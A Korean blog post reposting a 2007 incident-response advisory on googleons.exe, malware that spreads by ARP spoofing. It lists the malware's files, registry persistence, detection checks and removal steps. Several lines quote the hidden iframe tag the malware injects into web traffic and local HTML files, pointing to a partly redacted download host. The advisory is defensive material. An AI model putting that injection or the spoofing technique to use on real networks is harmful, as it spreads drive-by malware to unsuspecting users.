close

Trust Me!! Trust You!!


  • Blog
  • Local Log
  • Tag Cloud
  • Key Log
  • Guestbook
  • RSS Feed
  • Write a Post
  • Admin

혹시 블로그 스킨이 깨져 보이시나요? 최신버전의 Internet Explorer(Windows용), Opera, Firefox를 사용해보세요.

ARP Spoofing 공격 악성코드 주의

웹 프로그래밍
2007/11/13 16:14
 
1. 개요

(1)  최근 국내에서 ARP Spoofing을 통해 감염되고,

      감염 시 네트워크를 마비시키는 악성코드가 등장하여 주의가 필요함.
(2)  특히 네트워크 관리자는 내부 네트워크에서 ARP Spoofing 공격 여부를

      주기적으로 탐지하고 공격 근원지를 파악하여

      관련 악성코드가 실행 및 다운로드 되지 않도록 주의가 필요함.

 

 

 

2. 전파방법

(1)  최초 googleons.exe에 감염된 PC는 ARP Spoofing 공격

 -   해당 악성코드 감염시 네트워크에 존재하는 호스트 및 게이트웨이를 대상으로

      ARP Reply를 지속적으로 보냄.

 -   게이트웨이의 MAC 주소와 공격대상 호스트의 MAC 주소를 위조하는 ARP Reply를

      지속적으로 보냄.

(2)  감염된 PC와 동일 네트워크에 연결되어 있는 호스트들은

      감염된 PC를 게이트웨이로 인식하게 하여 모든 패킷을 모니터링 및 변조할 수 있음.

 -   ARP Spoofing 공격으로 정상 호스트가 웹 접속 시 감염 PC는 패킷을 가로채고

      아래와 같은 정보를 삽입해 악성코드 유포지 사이트로 유도.

      "<iframe src=http://down.online[생략].net/page/image/zzh.htm height=0></iframe>"

(3)  악성코드 유포지 down.online[생략].net으로 유도된 PC중

      아래와 같은 윈도우 취약점 패치가 안된 사이트는 googleons.exe에 감염됨.

 -   MS05-025
 -   MS06-014
 -   MS07-017
 -   MS07-027

 

 

 

3. 악성행위 (googleons.exe)

(1)  감염 PC와 동일 네트워크 대역 ARP Spoofing 공격.

(2)  동일 네트워크에 존재하는 PC들의 HTTP 통신 패킷 변조.

      "<iframe src=http://down.online[생략].net/page/image/zzh.htm height=0></iframe>

      </IFRAME P ?</IFRAME IFRAME " 삽입.

(3)  USB를 통한 악성코드 전파.

(4)  감염 PC에 존재하는 .html, tml, asp, php, jsp 확장자에 아래와 같은 악성코드 삽입.

      "<iframe src=http://down.online[생략].net/page/image/pd.htm height=0></iframe>

      </IFRAME P ?</IFRAME IFRAME "

(5)  감염시 생성되는 파일

 -    C:\Document and Settings\[계정]\Local Settings\Temp
       autoexec.bat (down.exe 최초 감염 악성코드, googleons.exe를 다운로드 및 실행)

       googleons.exe
       disocoo.exe (실행뒤 삭제)
       npptools.dll
       Packet.dll
       WanPacket.dll
       yahoons.exe (실행뒤 삭제)

 -    C:\windows\system32 (yahoons.exe 실행에 의해 생성되는 파일들)
       dllhost32.exe
       mh104.dll
       moyu103.dll
       mosou.exe
       mydata.exe
       nwizwmgjs.exe
       nwizwmgjs.dll
       nwizzhuxians.exe
       nwizzhuxians.dll
       RAV00xx.exe등 다수

 

(6)  부팅 후 재시작 할 수 있는 레지스트리에 등록.

 -   HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

 -   이름 : svc

 -   파일 이름 : googleons.exe

 

 

 

4. 감염여부 확인 및 치료방법

(1)  감염여부 확인
 -    L3 또는 라우터에서 감염 PC 확인.

      중복 MAC 주소 IP 확인 (악성코드 감염 IP 확인).

 

 -   ARP Spoofing 피해 PC에서 공격 PC 확인.

      전체 네트워크 Ping 스캔.

      중복 MAC 주소 IP 확인.

 

     


 -   악성코드 감염 및 ARP Spoofing 공격 PC 확인.

      C:\Document and Settings\[계정]\Local Settings\Temp\googleons.exe

      존재여부 확인

      googleons.exe 프로세스 실행여부 확인 [아래 치료방법 참조]

 

(2)  치료방법
 -   C:\Document and Settings\[계정]\Local Settings\Temp 하위 악성코드들 삭제.

 

     

 

 -   윈도우 시스템 폴더에 존재하는 악성코드들 삭제.

 

     

 

 -   googleons.exe 프로세스 끝내기.

      [Ctrl + Alt + Del] 클릭 후 프로세스 메뉴에서 googleons.exe 프로세스 종료.

 

     

 

 -   레지스트리 삭제.

 ①  googleons 재시작 레지스트리 삭제.

      [시작] → [실행] 선택, "regedit" 입력 후 악성코드가 생성한 아래의 레지스트리 삭제.

      HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

 ②  기타 악성코드 레지스트리 삭제.

      [시작] → [실행] 선택, "regedit" 입력 후 악성코드가 생성한 아래의 레지스트리 삭제.

      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

 

 

 

5. 예방 방법

(1)  감염을 위한 사전 예방 방법

 -    윈도 OS 최신 패치 실시.

 

     

 

 

 ※ 출처 : 인터넷 침해사고 대응지원센터

이올린에 북마크하기
No received trackback. / One comment was tagged.

Trackback Address :: http://viper150.cafe24.com/trackback/51

You can also say.

Prev 1 ... 248 249 250 251 252 253 254 255 256 ... 298 Next
블로그 이미지
이것저것 불펌금지도 퍼다가 담습니다. 외부에 비공개된 페이지 입니다. By. 어른왕자

카테고리

  • 전체 (298)
    • 사는 이야기 (115)
    • 웹 프로그래밍 (102)
    • App 프로그래밍 (22)
    • IT 뉴스&기타 (22)
    • 박한별 (4)
    • 역사&기타지식 (9)

태그목록

  • 달력
  • 전자정부프레임워크
  • 조선시대
  • 고전팝
  • java doc
  • 탭추가
  • 피곤
  • 우문술
  • UTF-8
  • javascript
  • 대결
  • 미국의료
  • 레지스트리
  • 만들기
  • BOA
  • tab
  • 의료민영화
  • 붕당정치
  • Ultraedit
  • 박근혜
  • ligagg
  • SLRCLUB
  • 파락호
  • 속담
  • 홍수아
  • hwpCtrl
  • MenuBar
  • 과음
  • 계산
  • 아이유착각

최근에 올라온 글

  • 보험사의 조정신청 대응방법.
  • 어느 천재의 앞선 시선.
  • [병맛더빙] 누구게..... (1)
  • 韓경제 `회색 코뿔소` 상황...
  • SVN Connector 설치 URL.
  • 군대를 가지 않는 서울대생.
  • “운은 하늘의 귀여움 받는...
  • 목장에서 알바하다가 캐스...
  • [펌]믿고 거르는 관상.
  • 하루에 1세트씩 하면 좋다...

최근에 달린 댓글

  • <p><img src="https://i.imgur... 브레드 15:23
  • <p><img src="https://i.imgur... 브레드 10:05
  • <p><img src="https://i.imgur... 브레드 08:07
  • <p><img src="https://i.imgur... 브레드 07:43
  • <p><img src="https://i.imgur... 브레드 02:56

최근에 받은 트랙백

  • công ty may đồng phục. công ty may đồng phục 01/08
  • Israelnightclub`s recent blo... Israelnightclub`s recent blo.. 01/06
  • Suggested Browsing. Suggested Browsing 01/06
  • similar site. similar site 01/06
  • לאתר הבית שלנו. לאתר הבית שלנו 01/06

글 보관함

  • 2019/03 (1)
  • 2018/12 (1)
  • 2018/09 (1)
  • 2018/08 (1)
  • 2018/02 (1)

달력

«   2021/01   »
일 월 화 수 목 금 토
          1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
31            

링크

  • Total : 261962
  • Today : 37
  • Yesterday : 40
Tattertools
Eolin
rss

어른왕자's blog is powered byTattertools1.1.2.2 : Animato